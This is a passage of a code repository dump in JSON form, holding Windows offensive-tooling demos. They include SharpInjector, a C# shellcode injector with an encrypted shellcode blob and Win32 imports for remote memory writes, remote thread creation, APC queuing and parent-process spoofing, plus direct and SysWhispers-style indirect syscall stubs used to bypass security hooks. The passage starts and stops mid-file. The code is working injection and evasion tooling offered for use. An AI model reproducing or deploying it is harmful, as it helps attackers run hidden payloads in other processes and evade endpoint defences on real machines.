7.3\r\n prompt\r\n MinimumRecommendedRules.ruleset\r\n true\r\n \r\n \r\n bin\\x64\\Release\\\r\n TRACE\r\n true\r\n pdbonly\r\n x64\r\n 7.3\r\n prompt\r\n MinimumRecommendedRules.ruleset\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n True\r\n True\r\n Resource1.resx\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ResXFileCodeGenerator\r\n Resource1.Designer.cs\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/Shellycode.cs", "content": "namespace SharpInjector\n{\n\tclass EncryptedShellcode\n\t{\n\t\t// Example calc shellcode\n\t\tpublic string EncSc = \"ypmx+PYrXoQ1YvU5yd8SfBK8GHSWQGxOXW298HKAnHSbW4jSmhjl38UOgVcUvfTEuBLFDn6FD1Bp9mjBLzcY9NZ7BW2bT3Z1WCWhdFe2by2qcFstu6M3d7Fx8bnM87Sk/b1x4UhrQEETW+O9v3YrNlUGjhG4Bcl3J1dojIEt9m9qPWz/VyU6KMufhwH18jgO0I/0tXYlj8bbV/zPKmNFSLb1v4WH/xn2+ON6YwCNDupduM5dQRBzZWNI2cDTxqA8/fmUECTQfxQnf7cjooCQ78U9i2T2B5MrrBMTOnIIHpRwb4rzruJHIA40DpuPLHi2w2wMEWlL2LT8X+09Rqd1jLdciC/PligV9N4tatz4h1g865LhnZKZ1inRTueMTNdfoKOPZZHb1/WB0JnQz4SwbmJygty9eqw0gL7bzb8a6gQC1qGCQpjzx4SRKAexgyM/7hRIc7Opy+Tr/91rNO6om3iWM0JSd+ze/+ttjweJCFbv5EP5rd4VMnq9Y7xJg8Cq\";\n\t}\n}\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/WinAPI.cs", "content": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Runtime.InteropServices;\n\nnamespace SharpInjector\n{\n class WinAPI\n {\n public static readonly UInt32 MEM_COMMIT = 0x1000;\n public static readonly UInt32 MEM_RESERVE = 0x2000;\n public static readonly UInt32 PAGE_EXECUTE_READ = 0x20;\n public static readonly UInt32 PAGE_READWRITE = 0x04;\n public static readonly UInt32 PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;\n public static readonly UInt32 SW_HIDE = 0x0000;\n\n public struct PROCESS_INFORMATION\n {\n public IntPtr hProcess;\n public IntPtr hThread;\n public uint dwProcessId;\n public uint dwThreadId;\n }\n\n public struct SECURITY_ATTRIBUTES\n {\n public int nLength;\n public IntPtr lpSecurityDescriptor;\n [MarshalAs(UnmanagedType.Bool)]\n public bool bInheritHandle;\n }\n\n public struct STARTUPINFO\n {\n public uint cb;\n public string lpReserved;\n public string lpDesktop;\n public string lpTitle;\n public uint dwX;\n public uint dwY;\n public uint dwXSize;\n public uint dwYSize;\n public uint dwXCountChars;\n public uint dwYCountChars;\n public uint dwFillAttribute;\n public uint dwFlags;\n public short wShowWindow;\n public short cbReserved2;\n public IntPtr lpReserved2;\n public IntPtr hStdInput;\n public IntPtr hStdOutput;\n public IntPtr hStdError;\n }\n\n public struct STARTUPINFOEX\n {\n public STARTUPINFO StartupInfo;\n public IntPtr lpAttributeList;\n }\n\n public enum StartupInfoFlags : uint\n {\n STARTF_USESHOWWINDOW = 0x00000001,\n STARTF_USESTDHANDLES = 0x00000100\n }\n\n public enum ProcessCreationFlags : uint\n {\n CREATE_NO_WINDOW = 0x08000000,\n CREATE_SUSPENDED = 0x00000004,\n EXTENDED_STARTUPINFO_PRESENT = 0x00080000\n }\n\n public enum ProcessAccessFlags : uint\n {\n PROCESS_CREATE_PROCESS = 0x0080,\n PROCESS_DUP_HANDLE = 0x0040\n }\n\n public enum FreeType : uint\n {\n MEM_DECOMMIT = 0x4000,\n MEM_RELEASE = 0x8000,\n }\n\n public enum ThreadAccess : int\n {\n SET_CONTEXT = 0x0010\n }\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool CloseHandle(\n IntPtr hObject\n );\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr ConvertThreadToFiber(\n IntPtr lpParameter);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr CreateFiber(\n uint dwStackSize,\n IntPtr lpStartAddress,\n IntPtr lpParameter);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool CreateProcess(\n string lpApplicationName,\n string lpCommandLine,\n ref SECURITY_ATTRIBUTES lpProcessAttributes,\n ref SECURITY_ATTRIBUTES lpThreadAttributes,\n bool bInheritHandles,\n ProcessCreationFlags dwCreationFlags,\n IntPtr lpEnvironment,\n string lpCurrentDirectory,\n ref STARTUPINFOEX lpStartupInfo,\n out PROCESS_INFORMATION lpProcessInformation);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr CreateThread(\n IntPtr lpThreadSecurityAttributes,\n uint dwStackSize,\n IntPtr lpStartAddress,\n IntPtr param,\n UInt32 dwCreationFlags,\n ref UInt32 lpThreadId);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr CreateRemoteThread(\n IntPtr hProcess,\n IntPtr lpThreadAttributes,\n uint dwStackSize,\n IntPtr lpStartAddress,\n IntPtr lpParameter,\n uint dwCreationFlags,\n IntPtr lpThreadId);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr CreateRemoteThreadEx(\n IntPtr hProcess,\n IntPtr lpThreadAttributes,\n uint dwStackSize,\n IntPtr lpStartAddress,\n IntPtr lpParameter,\n uint dwCreationFlags,\n IntPtr lpAttributeList,\n IntPtr lpThreadId);\n\n [DllImport(\"ntdll.dll\")]\n public static extern IntPtr EtwpCreateEtwThread(\n IntPtr lpStartAddress,\n IntPtr lpParameter);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool InitializeProcThreadAttributeList(\n IntPtr lpAttributeList,\n int dwAttributeCount,\n int dwFlags,\n ref IntPtr lpSize);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr OpenProcess(\n ProcessAccessFlags dwDesiredAccess,\n bool bInheritHandle,\n int dwProcessId);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr OpenThread(\n ThreadAccess dwDesiredAccess,\n bool bInheritHandle,\n int dwThreadId);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr QueueUserAPC(\n IntPtr pfnAPC,\n IntPtr hThread,\n IntPtr dwData\n );\n\n [DllImport(\"kernel32.dll\")]\n public static extern uint ResumeThread(\n IntPtr hThread);\n\n [DllImport(\"kernel32.dll\", EntryPoint = \"RtlMoveMemory\")]\n public static extern void RtlCopyMemory(\n IntPtr Destination,\n IntPtr Source,\n Int32 length);\n\n [DllImport(\"ntdll.dll\")]\n public static extern long RtlCreateUserThread(\n IntPtr hProcess,\n UInt32 SecurityDescriptor,\n bool CreateSuspended,\n ulong StackZeroBits,\n UInt32 StackReserved,\n UInt32 StackCommit,\n IntPtr StartAddress,\n UInt32 StartParameter,\n IntPtr Destination,\n out IntPtr hThread,\n out UInt32 ClientID);\n\n [DllImport(\"kernel32.dll\")]\n public static extern void SwitchToFiber(\n IntPtr lpFiber);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool TerminateProcess(\n IntPtr hProcess,\n uint uExitCode);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool UpdateProcThreadAttribute(\n IntPtr lpAttributeList,\n uint dwFlags,\n IntPtr Attribute,\n IntPtr lpValue,\n IntPtr cbSize,\n IntPtr lpPreviousValue,\n IntPtr lpReturnSize);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr VirtualAlloc(\n IntPtr lpAddress,\n Int32 dwSize,\n UInt32 flAllocationType,\n UInt32 flProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr VirtualAllocEx(\n IntPtr hProcess,\n IntPtr lpAddress,\n Int32 dwSize,\n UInt32 flAllocationType,\n UInt32 flProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool VirtualFree(\n IntPtr lpAddress,\n UInt32 dwSize,\n FreeType dwFreeType);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool VirtualFreeEx(\n IntPtr hProcess,\n IntPtr lpAddress,\n int dwSize,\n FreeType dwFreeType);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool VirtualProtect(\n IntPtr lpAddress,\n int dwSize,\n uint flNewProtect,\n out uint lpflOldProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool VirtualProtectEx(\n IntPtr handle,\n IntPtr lpAddress,\n int dwSize,\n uint flNewProtect,\n out uint lpflOldProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern UInt32 WaitForSingleObject(\n IntPtr hHandle,\n uint dwMilliseconds);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool WriteProcessMemory(\n IntPtr hProcess,\n IntPtr lpBaseAddress,\n byte[] lpBuffer,\n int nSize,\n out IntPtr lpNumberofBytesWritten);\n\n public static void Clean(IntPtr hprocess, IntPtr address, int length)\n {\n VirtualFreeEx(hprocess, address, length, WinAPI.FreeType.MEM_RELEASE);\n TerminateProcess(hprocess, 0);\n }\n }\n}\n" }, { "path": "demo3/SharpInjector-master/SharpInjector.sln", "content": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.29905.134\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}\") = \"SharpInjector\", \"SharpInjector\\SharpInjector.csproj\", \"{4744C438-5A65-4EC7-89BD-2A027531B2B0}\"\nEndProject\nProject(\"{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}\") = \"ScEncryptor\", \"ScEncryptor\\ScEncryptor.csproj\", \"{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tAll|Any CPU = All|Any CPU\n\t\tAll|x64 = All|x64\n\t\tDebug|Any CPU = Debug|Any CPU\n\t\tDebug|x64 = Debug|x64\n\t\tRelease|Any CPU = Release|Any CPU\n\t\tRelease|x64 = Release|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.All|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.All|Any CPU.Build.0 = Release|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.All|x64.ActiveCfg = Release|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.All|x64.Build.0 = Release|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Debug|Any CPU.Build.0 = Debug|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Debug|x64.Build.0 = Debug|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Release|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Release|Any CPU.Build.0 = Release|Any CPU\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Release|x64.ActiveCfg = Release|x64\n\t\t{4744C438-5A65-4EC7-89BD-2A027531B2B0}.Release|x64.Build.0 = Release|x64\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.All|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.All|Any CPU.Build.0 = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.All|x64.ActiveCfg = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.All|x64.Build.0 = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Debug|Any CPU.Build.0 = Debug|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Debug|x64.ActiveCfg = Debug|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Debug|x64.Build.0 = Debug|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Release|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Release|Any CPU.Build.0 = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Release|x64.ActiveCfg = Release|Any CPU\n\t\t{27780A45-FC10-4E68-A461-FCCEAF2D1BD6}.Release|x64.Build.0 = Release|Any CPU\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {582509EF-455C-4D56-B480-B8FF737B9395}\n\tEndGlobalSection\nEndGlobal\n" }, { "path": "demo4/syscall/syscall/Syscall.asm", "content": ".code\r\n\tSysNtCreateFile proc\r\n\t\t\tmov r10, rcx\r\n\t\t\tmov eax, 55h\r\n\t\t\tsyscall\r\n\t\t\tret\r\n\tSysNtCreateFile endp\r\nend" }, { "path": "demo4/syscall/syscall/syscall.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 16.0\r\n {9DF66DE1-4F6F-4257-96C8-E20E311FEA00}\r\n Win32Proj\r\n syscall\r\n 10.0\r\n \r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n \r\n \r\n false\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n Disabled\r\n true\r\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n MaxSpeed\r\n true\r\n true\r\n true\r\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n MaxSpeed\r\n true\r\n true\r\n true\r\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n Document\r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "demo4/syscall/syscall/syscall.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;hm;inl;inc;ipp;xsd\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n" }, { "path": "demo4/syscall/syscall/syscall.vcxproj.user", "content": "\r\n\r\n \r\n" }, { "path": "demo4/syscall/syscall/syscall_call.cpp", "content": "#include \r\n#include \"winternl.h\"\r\n#pragma comment(lib, \"ntdll\")\r\n\r\nEXTERN_C NTSTATUS SysNtCreateFile(\r\n\tPHANDLE FileHandle,\r\n\tACCESS_MASK DesiredAccess,\r\n\tPOBJECT_ATTRIBUTES ObjectAttributes,\r\n\tPIO_STATUS_BLOCK IoStatusBlock,\r\n\tPLARGE_INTEGER AllocationSize,\r\n\tULONG FileAttributes,\r\n\tULONG ShareAccess,\r\n\tULONG CreateDisposition,\r\n\tULONG CreateOptions,\r\n\tPVOID EaBuffer,\r\n\tULONG EaLength);\r\n\r\nint main()\r\n{\r\n\tFARPROC addr = GetProcAddress(LoadLibraryA(\"ntdll\"), \"NtCreateFile\");\r\n\r\n\tOBJECT_ATTRIBUTES oa;\r\n\tHANDLE fileHandle = NULL;\r\n\tNTSTATUS status = NULL;\r\n\tUNICODE_STRING fileName;\r\n\tIO_STATUS_BLOCK osb;\r\n\r\n\tRtlInitUnicodeString(&fileName, (PCWSTR)L\"\\\\??\\\\c:\\\\temp\\\\test.txt\");\r\n\tZeroMemory(&osb, sizeof(IO_STATUS_BLOCK));\r\n\tInitializeObjectAttributes(&oa, &fileName, OBJ_CASE_INSENSITIVE, NULL, NULL);\r\n\r\n\tSysNtCreateFile(\r\n\t\t&fileHandle,\r\n\t\tFILE_GENERIC_WRITE,\r\n\t\t&oa,\r\n\t\t&osb,\r\n\t\t0,\r\n\t\tFILE_ATTRIBUTE_NORMAL,\r\n\t\tFILE_SHARE_WRITE,\r\n\t\tFILE_OVERWRITE_IF,\r\n\t\tFILE_SYNCHRONOUS_IO_NONALERT,\r\n\t\tNULL,\r\n\t\t0);\r\n\r\n\treturn 0;\r\n}" }, { "path": "demo4/syscall/syscall/x64/Debug/syscall.exe.recipe", "content": "\r\n\r\n \r\n \r\n C:\\Users\\Admin\\Desktop\\20220617\\syscall\\x64\\Debug\\syscall.exe\r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "demo4/syscall/syscall/x64/Debug/syscall.log", "content": " Assembling Syscall.asm...\r\n syscall.vcxproj -> C:\\Users\\Admin\\Desktop\\20220617\\syscall\\x64\\Debug\\syscall.exe\r\n" }, { "path": "demo4/syscall/syscall/x64/Debug/syscall.tlog/syscall.lastbuildstate", "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|C:\\Users\\Admin\\Desktop\\20220617\\syscall\\|\r\n" }, { "path": "demo4/syscall/syscall.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"syscall\", \"syscall\\syscall.vcxproj\", \"{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Release|x64.Build.0 = Release|x64\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{9DF66DE1-4F6F-4257-96C8-E20E311FEA00}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {DB6653FE-4439-4C94-BBE7-BF00CC5AE3F3}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "demo5/syscall3/syscall3/1-asm.x64.asm", "content": ".code\r\n\r\nEXTERN SW3_GetSyscallNumber: PROC\r\n\r\nEXTERN SW3_GetSyscallAddress: PROC\r\n\r\nNtCreateProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0F5A717B7h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0F5A717B7h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtCreateProcess ENDP\r\n\r\nNtCreateThreadEx PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 094AF2795h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 094AF2795h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtCreateThreadEx ENDP\r\n\r\nNtOpenProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 04E2E47B4h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 04E2E47B4h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtOpenProcess ENDP\r\n\r\nNtOpenProcessToken PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03DAF1132h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 03DAF1132h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtOpenProcessToken ENDP\r\n\r\nNtTestAlert PROC\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 00E94313Eh ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 00E94313Eh ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtTestAlert ENDP\r\n\r\nNtOpenThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 01838D296h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 01838D296h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtOpenThread ENDP\r\n\r\nNtSuspendProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0D31DF082h ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 0D31DF082h ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtSuspendProcess ENDP\r\n\r\nNtSuspendThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 09947D46Eh ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 09947D46Eh ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtSuspendThread ENDP\r\n\r\nNtResumeProcess PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 05DC3545Eh ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into syscall offset.\r\n\tmov r15, rax ; Save the address of the syscall\r\n\tmov ecx, 05DC3545Eh ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8] ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15 ; Jump to -> Invoke system call.\r\nNtResumeProcess ENDP\r\n\r\nNtResumeThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 018BE9C9Fh ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress ; Resolve function hash into 